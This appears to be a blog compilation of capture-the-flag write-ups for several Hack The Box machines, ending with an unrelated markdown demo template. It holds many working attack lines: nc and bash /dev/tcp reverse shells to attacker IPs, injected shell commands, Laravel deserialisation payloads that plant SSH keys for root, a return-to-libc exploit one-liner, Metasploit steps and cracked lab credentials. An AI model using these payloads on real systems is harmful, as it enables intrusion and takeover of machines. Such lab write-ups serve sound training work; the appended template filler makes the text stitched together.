1.nmap scan

SMB shares 445/139

first use smbmap to list shares and permissions

smbmap -H 10.10.10.123

smbclient -N -L //10.10.10.123

-N represent null session (or no auth) and -L to list

the comment of Files says that its /etc/Files
so we can use nmap to verify

nmap --script smb-enum-shares.nse -p445 10.10.10.123

Development

The Development share is empty:

general

The general share has a single file,we can get it and have a look

its a cred

TCP 80

the site give us a new domain friendzoneportal.red
we now use dirsearch to find some paths

the robots.txt just a phrase

and the wordpress is empty dir

https 443

first use the comman name get via nmap to visit https://friendzone.red:443/
the site just has a picture

and if we view page source,we can get another path

the js/js path has a encode string,so we can try to decode it

it also have a hint

i temporarily don’t know what’s the meaning of it

TCP/UDP 53

TCP is only used in DNS when the response size is greater than 512 bytes. Typically this is associated with Zone Transfers, where the server give all the information it has for a domain. There’s a few things I could try to enumerate DNS, but the fact that the host is listening on TCP 53 suggests the first thing I should try is a Zone Transfer.
I’ll do that with dig. I’ll start with friendzone.htb, and get nothing:

Since I have a domain name in the TLS certificate, I’ll try that:

I can also try the domain I got on the first webpage, “friendzoneportal.red”:

I’ll update my hosts file for each of these:

administrator1.friendzone.red

2.get webshell access

Find LFI

because the pic is load by the full path,we can try to find load file inclusion
1.image_id
The image_id, such as a.jpg is a full file name. I’ll try giving it a php page, which it would load if that file is being shown using include in php. Unfortunately, it just shows a broken image:

Looking at the source, I see <img src='images/timestamp.php'>. I could play with XSS here, and see if I can get it to load a script. For example, if I set image_id=' onerror='javascript: alert("XXS HERE");, I get a pop-up:

The source explains it: <img src='images/' onerror='javascript: alert("XXS HERE");'>
2.pagename
Since the given example case is timestamp, and there’s a timestamp.php in the same directory, I can assume that this is likely doing a include($_GET["pagename"] . ".php"). I can test this by having it point to other php pages.
Visiting https://administrator1.friendzone.red/login.php returns: Wrong!
and we change to pagename to login can also see the same word

read PHP resource

I can use this LFI to read source code for these pages using php filters. If I visit pagename=php://filter/convert.base64-encode/resource=dashboard, I can see a long base64 string on the page:

decoding it,and we can find something

we can do the same thing to read upload pagename=php://filter/convert.base64-encode/resource=../uploads/upload

webshell

I want to use this LFI to include a webshell so I can run commands. I’ll use my smb access to drop a simple php command shell into the Development share, which nmap told me was /etc/Development.

and upload it to the machine

smbclient -N //10.10.10.123/Development -c 'put cmd.php zyz.php'

I’ll use my go to from the Reverse Shell Cheat Sheet and visit: https://administrator1.friendzone.red/dashboard.php?image_id=&pagename=../../../etc/Development/zyz&cmd=rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>%261|nc 10.10.16.10 4444 >/tmp/f (remembering to encode the & as %26):

After a shell upgrade (python -c 'import pty;pty.spawn("bash")', ctrl-z, stty raw -echo;fg, reset, enter “screen” for terminal type if asked), I’ve got a full shell. And I can get user.txt.
In the /var/www/ directory, there’s folders for all the different sites, as well as an sql conf file:

use the password to su friend

3.get root access

search around the machine, there has a py script in /opt/server_admin

find /tmp can write to upload our pspy

our machine:python3 -m http.server 80
target machine:wget http://10.10.16.10/pspy32s
               chmod +x pspy32s
       ./pspy32s

and we can find that root was running this script every two minutes:

via linpeas.sh,we find a file that friend can write

we append the following scripts to the end of it

and finally we get the root

1.nmap scan

echo "10.10.10.222 helpdesk.delivery.htb" >> /etc/hosts

2.website

the port 80 shows nothing,but we can change to http://helpdesk.delivery.htb/index.php to get some information

it shows it’s run a osTicket structer on 80
and on port 8065,it shows another login page

i first add a user in mattermost and try to find a exploit
it need me to varify
so let’s use searchsploit osticket and try to exploit
all the register need verify
as a guest,we can open a new ticket and see it’s feedback

3.getting webshell access

because the machine can not access to the internet,the verify step is unable
but when I created a ticket, it offered the ability to update the ticket over email. I can use that to get the verification email.

I’ll create a ticket and get the email address for it. Then sign up for a MatterMost account:


the default email is 2200493@delivery.htb
register a new account use 2200493@delivery.htb

check the ticketnum use 2200493

and now we get the verify mail

verify the link and we can get in

in the website,we can see a credential —maildeliverer:Youve_G0t_Mail!
and it shows a hint that may password are PleaseSubscribe!

then i can try to use creds i just get to ssh the machine

4.getting root access

Mattermost stores it’s configuration in /opt/mattermost/config/config.json. The database connection information is in here:

username:mmuser
password:Crack_The_MM_Admin_PW
database:mattermost

we can get username and password from the table User

select Username,Password from Users;

crack root password

we can save the hash to a file and save the hint PleaseSubscribe! to another file

and the result is PleaseSubscribe!21

finally,we get the root

1.nmap scan

first we add the host to /etc/hosts

echo "10.10.11.105 horizontall.htb" >> /etc/hosts

2.getting web access

the website don’t have any button can link to other pages
the page has two js file,and we can read them to find something

The JavaScript in app.c68eb462.js is minified, but tossing it into a jsFormatter returns 654 lines of JavaScript. Glancing through it, this section jumped out because it reveals a subdomain:

after this,i also use firsearch and fuzz to test the website,but we don’t have some useful information
so we first add the api-prod.horizontall.htb to /etc/hosts

echo "10.10.11.105 api-prod.horizontall.htb" >> /etc/hosts

and visit the page and use dirsearch the site,we can see some admin pages and a /reviews page

the reviews page returns a json string

in the admin page,we know it build with strapi
we can use searchsploit to search and use msfconsole to make some exploit

we can see the poc and get the way to know the version


the version greatly match the exploit,so we can try to change the password

we can use the command to reverse a shell

bash -c 'bash -i >& /dev/tcp/10.10.14.15/8888 0>&1'

python3 -c 'import pty;pty.spawn("/bin/bash")'

in the /home/developer,we don’t have permission

3.getting root acccess

the existence of a composer-setup.php file suggests there’s some kind of PHP site in use here.
Looking at the netstat, there’s the site on 80, and a NodeJS side on 1337. There’s also MySQL on 3306 (which makes sense). But there’s also something on 8000:

The service on 8000 is an HTTP server:

And based on the response and the cookies, it looks like Laravel, a PHP framework.

page access

the strapi user’s home directory is /opt/strapi, I can still add a .ssh directory and an authorized_keys file. I’ll add my key:


now we get a default page running in localhost:8000

use dirsearch and we can find a /profiles

But not only does it crash, but it returns a bunch of information. This is Laravel debug mode.

exploit 1

the laravel has a remote code execution <=v8.4.2 Debug Mode
we can get a poc from repo

Reviewing the code we see where the id command is being executed:

we can set the SUID bit to bash for a quick privilege escalation to root shown in the rce2:

we can see that the SUID is set with ls -l /bin/bash

exploit 2

To show it works, I’ll start with the id command. First, I’ll generate the payload using phpggc:

php -d'phar.readonly=0' /opt/phpggc/phpggc --phar phar -o id.phar --fast-destruct monolog/rce1 system id

This creates a serialized PHP file, which I saved as id.phar. The file looks like a PHP object:

the command,id, is on line 0x000000f0.
Now I’ll run the Python script, passing it the serialized payload:

python3 /opt/laravel-exploits/laravel-ignition-rce.py http://127.0.0.1:8000 id.phar 

to get a shell,we can regenerate a new payload, this time creating /root/.ssh if it doesn’t exist, and then writing my SSH key to authorized_keys:

php -d'phar.readonly=0' /opt/phpggc/phpggc --phar phar -o ssh.phar --fast-destruct monolog/rce1 system 'mkdir -p /root/.ssh; echo "ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIDIK/xSi58QvP1UqH+nBwpD1WQ7IaxiVdTpsg5U19G3d nobody@nothing" >> /root/.ssh/authorized_keys'

Run the exploit again,and we can also get the root access.

1.nmap scan

2.website

it just has a login page
let’s use dirsearch to find some directories
we can see some pages redirect to login.php

we use burpsuite to catch the response,and we can see a register page but admin can use

we can use burpsuite manually change the status code to 200 ok to visit the accounts.php

and thus we can get a access to accounts.php

now we can add a user to test it
if we don’t want to have to do this for each page action. We can have Burp do this for use while we browse the site. Go to Proxy > Options > Match and Replace > Add and set the following options:

1
2
3

Type: Response header
Match: 302 Found
Replace: 200 OK

now we can download the sitebackup.zip and unzip it
in the logs.php,we can see a function uses exec and we just need to post a $delim

we can reverse the request method and add a delim to get a response

We can test for Command Injection by adding a ;curl+http://10.10.14.15/ after the POST request:

so we can try to reverse a shell to our machine

;bash -c 'bash -i >& /dev/tcp/10.10.14.15/8888 0>&1' <- this need to urlencode
nc -lvnp 8888

now we still can’t get the userflag
Next we can upgrade our shell to a more interactive one:

1
2
3

python3 -c 'import pty;pty.spawn("/bin/bash")' then press Ctrl+Z
stty raw -echo;fg then press ENTER twice
export TERM=xterm

we can get the mysql username and password from the config.php

username:root
password:mySQL_p@ssw0rd!:)
db:previse
and now we can get into the database

and in the database previse,we get two tables

we can use m4lwhere to ssh it,but first we should crack it’s password
copy the hash use hashcat to crack it with the command
hashcat -m 500 hash.txt /usr/share/wordlists/rockyou.txt

username:m4lwhere
password:ilovecody112235!
and now we can try to ssh it

ssh m4lwhere@10.10.11.104

and we get in

finally,we get the userflag

3. getting access to root

first,we use sodo -l to find some command not need root password

Reading over the script, we see that both the gzip and the date command don’t have the full PATH set to them:

the PATH in Linux is how the system looks for the binary that we are trying to execute:

In this case, it is going to look in /usr/local/sbin then if it is not there, it looks at /usr/local/bin and so on until it is found.
We can manipulate this by changing the PATH, we can make the first entry in the PATH our current directory with the command export PATH=.:$PATH

And you can see that when I look for the cat command where our custom one is, it points out to that current directory.
So we can do the same thing with gzip or date back in the victim’s machine. First let’s create our own malicious gzip command:

cp /bin/bash /tmp/bash && chomd u+s /tmp/bash

This will create a SUID bash command that we can use for easy root access. Next we can change the PATH so that it points to our current directory:

and now execute backup.sh

and final we execute /tmp/bash -p,we get the root

1.nmap scan

2.web

from the burpsuite,we can get the response and know it build with drupal 7

when we use searchsploit,we can see some exploit

we can use msfconsole to exploit it

1
2
3
4

search drupal 7
use 1
set rhosts 10.10.10.233
set lhost 10.10.14.15

and we can get the shell

it denied us to cd /home
so we cd to sites/default and in the settings.php,we can get the database’s username and password

username:drupaluser
password:CQHEy@9M*m23gBVj

we can try this to login mysql
but in the /etc/passwd,we didn’t see drupaluser,therefore we probably need to get password hashes from the database itself:

Using the credentials drupaluser:CQHEy@9M*m23gBVj, we can get the databases users and hashes.

mysql -u drupaluser -p"CQHEy@9M*m23gBVj" -e "use drupal; select name,pass from users;"

john -w=/usr/share/wordlists/rockyou.txt hash.txt

username:brucetherealadmin
password:booboo
And we have brucetherealadmin’s password! Now let’s try to login via SSH:

3.getting root access

when we use sudo -l,Looks like we are able to run snap as the root user without any password, therefore let’s use the gtfobin for snap:

first we get fpm and do something next

gem install fpm

1.nmap scan

port exploration

9999: at 10.10.10.111:9999,it’s a simple nginx welcome page
445: smb is running on the 445,we can use common ways to find if there is something can be used

 smbmap -H 10.10.10.111 

smbmap shows nothing we can use

 smbclient -N -L //10.10.10.111

and smbclient also shows nothing interesting

1880: the 9999 port’s site gives us a url:http://forlic.htb:1880
it’s an admin web

dirsearch

we try dirsearch to all ports we find,and in 9999 there has some pages

10.10.10.111:9999/test has a phpinfo page
10.10.10.111:9999/backup has something useful
10.10.10.111:9999/dev is forbidden
10.10.10.111:9999/admin is an admin page

we can use curl 10.10.10.111:9999/backup/user.txt and curl 10.10.10.111:9999/backup/password.txt to get admin and imnothuman

dirsearch deeper

though the /dev is forbidden,we use dirsearch http:10.10.10.111:9999/dev to explore deeper
it has backup and test

in the /backup,it shows /playsms
in the /test,it provides a file name test
10.10.10.111:9999/playsms is another login page

/admin

the /admin loads a js hide the login information

the username is admin and the password is superduperlooperpassword_lol
after entering it,we can see a brainfuck code,and to decode it

https://www.dcode.fr/ook-language

it shows Nothing here check /asdiSIAJJ0QWE9JAS
after visit it,it displays a new page encoded,after decoded,we get some message

decode it,and it seems like a zip curl -s http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/ | base64 -d | xxd

curl -s http://10.10.10.111:9999/asdiSIAJJ0QWE9JAS/ | base64 -d > index.php.zip
unzip it,it has a password
use fcrackzip to unpack it
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt out.zip
The options are -u to force actual unzip, which weeds out tons of fps, -D for dictionary, and -p rockyou.txt to pass the wordlist.and the password=password

Use xxd to read that back to bytes, which happens to be not only ASCII, but base64 characters cat index.php | xxd -r -p

decode it,and get the text
cat index.php | xxd -r -p | tr -d '\r\n' | base64 -d

it’s brainfuck,decode at https://copy.sh/brainfuck/ and get the phrase idkwhatispass

2.shell as web

now we have two password

1.admin/superduperlooperpassword_lol 2.admin/idkwhatispass
try it at /admin /playsms and final password2 worked on /playsms

use msfconsole

1
2
3
4
5
6
7

msfconsole
search playsms
use 1
set rhost 10.10.10.111
set rport 9999
set targeturi /playsms/index.php
set lhost 10.10.14.15

then we get a webshell

3.shell as root

first improve the shell

python3 -c 'import pty;pty.spawn("/bin/bash")'

cat /proc/sys/kernel/randomize_va_space

it shows no ASLR
because we stright open it can’t read it,so we use base64 to read
and save it to local machine and use base64 -d rop_b64 > rop to restore it

open it in gdb with PEDA, and run checksec

we can force the program to crash

background

I can cause the program to crash by sending too much input which likely means I can overwrite the return address somewhere. Given that ASLR is disabled but DEP (NX) is enabled, the easiest attack path is to use Return to libc.

understand return to libc

1.stack

The stack starts at high memory addresses, and builds up to lower memory addresses. Inside any given function, there’s a stack frame. The bottom of the stack frame is stored in the RBP (or EBP on x86) register. The top is stored in RSP (or ESP). For example (and I’ll use 32-bit registers in this example since Frolic is 32-bit):

2.function call

When a function is called, the arguments are put onto the stack (either by adding space to the top or using the space already there). So, for example, the program comes to:

Just before the call, two addresses are stored in ESP and ESP+4. These are the addresses of the string to copy and the buffer to copy it to:

Now the call instruction is reached. It is going to push the next instruction to the top of the stack (as the return address), and then jump execution to the new function. The next function is going to start with some common stuff, known as the prologue:

So take that step by step. call pushes return address:

Now push ebp:

mov ebp, esp:

Finally sub esp, 0x100:

3. stack return

When a function is done, it will typically end with:

1
2

leave
ret

leave == mov esp, ebp + pop ebp
So the stack from before becomes:

Then when the return happens, the instruction pointer is popped, bringing that stack back to where it started:

4.What Is Return to libc

A return to libc attack involves overwriting the return address in such a way that the computer jumps to the function I want. The standard case is the system function, with the argument /bin/sh, giving me a shell.

If I were to call system(“/bin/sh”) normally, I would enter the function after the call but before the prologue with a stack like this:

The return address would be pushed onto the stack by the call instruction. But I’m not going to be going to system via a call, but rather a ret. So, I want the stack to look like this when I reach the return:

That way, ret will pop the system address into the instruction pointer, and the stack will look right. Since I don’t know the right return address, I’ll just use the function exit, so it cleanly exits when I’m done.

Find the Offset to EIP

open the file with gbb-peda,and When the program crashes, I can take EIP and find out where that was in the pattern using pattern offset

When the program crashes, I can take EIP and find out where that was in the pattern using pattern offset. I can use the ASCII or hex value:

To double check that, I’ll send in a buffer of 52 As and then 4 Bs:

Crash, with EIP as BBBB.

Addresses

Now I just need the addresses of system, exit, and /bin/sh in libc. This will vary on different hosts, so I’ll get the info with my shell on Frolic. First, I’ll get the base libc address with ldd,
Next, I’ll use readelf -s to get the offsets to various functions, and grep out system and exit,
Now I’ll use strings -a -t x to get the strings from libc with hex offsets, and grep for “/bin/sh”:

Now I can calculate the address for each of the three using any calculator (gdb here):

exploit

I can put that all together into this template: "A" * 52 + SYSTEM + EXIT + /bin/sh. I could write a python script to do this, but this case is simple enough that I can just do it as a one-liner. When I run that on Frolic, I’m root:
./rop $(python -c 'print("a"*52 + "\xa0\x3d\xe5\xb7" + "\xd0\x79\xe4\xb7" + "\x0b\x4a\xf7\xb7")')
now we finally get the flag

1.nmap scan

nmap -sCV –min-rate=10000 -p- 10.10.10.226

2.site

in the website,it has three parts
the first is nmap moudle,when we type a ip,it will send back the nmap result
the payload section allows me to generate a payload after choose ip,os and template file
the third part seems like searchspolit moudle

foothold

when we search msfvenom, we can see it has a exploit before the version 6.0.11

we can have a try
msfvenom handles an APK template file. The idea of the template file is that you can pass msfvenom a legit .exe or .apk, and it will try to build a malicious file into that file while preserving the intended capability. This functionality allows for attackers to hide behind the legit functionality.

build payload

we can use searchspolit -m 49491.py to use this
change the payload to bash -c 'bash -i >&/dev/tcp/10.10.14.15/8888 0>&1' to reverse a shell
if the execution get wrong,first use apt-get install openjdk-11-jdk-headless to enable jarsigner
or we can use msfconsole to generate an apk,we should change the payload to cmd/unix/reverse_netcat

1
2
3
4
5
6
7

use msfconsole
search msfvenom
use 0
set payload cmd/unix/reverse
set lhost xxxx
run

get webshell

and we can upload the apk to the website
on the website “payloads” section, select Android for OS and upload the APK file that was generated by MetaSploit

in the /home folder,we can find two users called kid and pwn

in the pwn’s folder,we can find a script called scanlosers.sh

the script’s function is to scan ips written in /home/kid/logs/hackers
but this script doesn’t deal the input the hackers provides
so we can append a reverse shell command into the file
echo "test ;/bin/bash -c 'bash -i >&/dev/tcp/10.10.14.15/8888 0>&1' #”

3.shell as root

in the pwn,it can sudo msfconsole without password

and we get the root

we can exec command in msf or use /bin/bash -i to change to the root

1.nmap scan

nmap -sCV –min-rate=10000 -p- 10.10.10.75

2.site

web

in the website,it just has hello world,but in the source code,it hides a hint
<!-- /nibbleblog/ directory. Nothing interesting here! -->
visit it

dirsearch

we use dirsearch to display its menu and we can find some pages that can visit

when we visit some of them,we can get it’s machine menu
In exploring the resulting paths, /nibbleblog/content is interesting, and has dir lists enabled. Digging deeper, there’s a page at /nibbleblog/content/private/user.xml which reveals a user, admin, as well as the IPs that have tried to log in as it

logging into admin

visit http://10.10.10.75/nibbleblog/admin.php
we don’t have the creds,in most writeups says they guess the password or use the information get from http://10.10.10.75/nibbleblog/content/private/config.xml-admin-nibbles

Exploitaion

in the settings page, we konw that the site is nibbleblog 4.0.3
we can use searchspolit to find some poc
it has a fileupload exploit
we use msf to get webshell

after this,we can get user.txt

3.getting root

first get a fully interactive shell using the python pty.spawn one liner

1

python3 -c 'import pty;pty.spawn("/bin/bash")'

sudo trick
from this article,we can learn that how to use sudo-enabled files to open system-level tools like /bin/bash.
If you have write and execute permissions to a file that runs with elevated privileges, you can add commands such as system calls to get what you want.
we can use the next command to get the root

1
2
3

echo "#! /bin/bash" > monitor.sh
echo "/bin/bash -i" >> monitor.sh
sudo ./monitor.sh

h1 标题

h2 标题

h3 标题

h4 标题

h5 标题

h6 标题

水平线

文本样式

This is bold text

This is bold text

This is italic text

This is italic text

Strikethrough

列表

无序

• Create a list by starting a line with +, -, or *
• Sub-lists are made by indenting 2 spaces:
  • Marker character change forces new list start:
    • Ac tristique libero volutpat at
    • Facilisis in pretium nisl aliquet
    • Nulla volutpat aliquam velit
• Very easy!

有序

1. Lorem ipsum dolor sit amet

2. Consectetur adipiscing elit

3. Integer molestie lorem at massa

4. You can use sequential numbers…

5. …or keep all the numbers as 1.

Start numbering with offset:

57. foo
58. bar

代码

Inline code

Indented code

// Some comments
line 1 of code
line 2 of code
line 3 of code

Block code “fences”

1

Sample text here...

Syntax highlighting

1
2
3
4
5

var foo = function (bar) {
  return bar++;
};

console.log(foo(5));